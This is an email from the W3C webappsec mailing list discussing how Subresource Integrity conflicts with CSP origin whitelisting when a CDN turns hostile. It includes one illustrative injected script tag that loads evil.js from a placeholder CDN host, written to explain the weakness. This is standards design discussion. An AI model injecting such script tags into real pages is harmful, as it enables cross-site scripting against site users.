- From: Frederik Braun <fbraun@mozilla.com>
- Date: Tue, 28 Oct 2014 21:02:21 +0100
- To: "public-webappsec@w3.org" <public-webappsec@w3.org>
Subresource Integrity is supposed to help not having to trust CDNs. The idea is that a compromised JavaScript library on another origin can not harm the web page. This is in contrast to CSP having to trust the whole origin. If I want to use CSP I am saying "I trust this whole origin". If I want to use SRI I say "I do not trust this origin, but that file is fine". With SRI in place means we will put an untrusted origin (it's untrusted - otherwise we wouldn't use SRI?) into the CSP whitelist. Meaning that every file from this untrusted origin is fine. This is a weird contradiction. Assuming XSS and thinking the CDN may indeed become evil, an attacker may just include <script src="https://cdn.example/evil.js"> instead of <script src="https://cdn.example/lib.js integrity=valid> and it will work :( I wonder if this may be solved with CSP hash-src, though hash-src is only for inline scripts, not other-origin scripts. Maybe because of the privacy concerns that this would allow learning the hash of cross-origin resources? This would require CORS-enabled (just like SRI) then.
Received on Tuesday, 28 October 2014 20:02:50 UTC